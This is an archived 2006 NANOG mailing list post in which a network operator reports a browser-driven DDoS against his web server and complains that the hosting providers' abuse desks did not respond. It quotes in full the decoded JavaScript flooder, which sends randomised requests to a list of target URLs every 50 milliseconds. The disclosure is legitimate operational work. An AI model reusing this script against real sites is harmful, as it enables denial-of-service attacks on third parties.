nanog mailing list archives
Ongoing DDoS helped by non responsive abuse desks
From: "Martin Lathoud" <nytral () gmail com>
Date: Thu, 23 Mar 2006 10:54:56 -0500
Hi, One of our web servers got hammered by ~5K req/s for hours from browsers with the following referer: http://www.freewebs.com/ihatespammers/nospam.html Both freewebs.com and their network provider Cogent has been contacted without any visible result, even if the script is very effective (no filtering slows it down but redirecting to an https with an invalid cert eventually messes the attackers' browser). Given that the source is still up (and has been updated since yesterday), I wonder what one can expect by contacting each concerned domain host. The decrypted jscript is: var target=new Array(); target[0]="http://weerona.com/ph/order.php?%rand%" target[1]="http://fabutons.info/aw/001/?%rand%" target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%" target[3]="http://www.fakeidonline.com/store.php?%rand%" target[4]="http://ccebak.bestti.info/p/?%rand%" target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%" target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%" target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost" //target[5]="http://zzizuyxxqquzjphyn.logomarz.com/counter.php?%rand%" //target[6]="http://svbcrwevktdbxf.logomarz.com/counter.php?%rand%" //target[7]="http://fqnbywsqfghz.logomarz.com/counter.php?%rand%" //target[8]="http://fvguwwnemlpgkd.logomarz.com/counter.php?%rand%" //target[9]="http://www.logodentity.com/ordernow.php?%rand%" //target[10]="http://www.clearlogo.com/ordernow.php?plan=1&%rand%=%rand%" //target[11]="http://www.heartysouvenirs.info/?page=shoppingcart&%rand%=%rand%" //target[9]="http://www.webpromotionnow.com/?%rand%" // Do not edit below this line var arrcount = 0; var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"; function doddos(){ var randomstring = ''; for (var i=0; i<8; i++) { var rnum = Math.floor(Math.random() * chars.length); randomstring += chars.substring(rnum,rnum+1); } if (arrcount > (target.length - 1)){ arrcount = 0; } var dimg = new Image; dimg.src=target[arrcount].replace(/\%rand\%/g,randomstring); arrcount++; setTimeout("doddos()",50); } setTimeout("doddos()",50);
Current thread:
- Ongoing DDoS helped by non responsive abuse desks Martin Lathoud (Mar 23)
- Re: Ongoing DDoS helped by non responsive abuse desks Steve Atkins (Mar 23)
- Re: Ongoing DDoS helped by non responsive abuse desks Martin Lathoud (Mar 23)
- Re: Ongoing DDoS helped by non responsive abuse desks Steve Linford (Mar 23)
- Re: Ongoing DDoS helped by non responsive abuse desks Steve Atkins (Mar 23)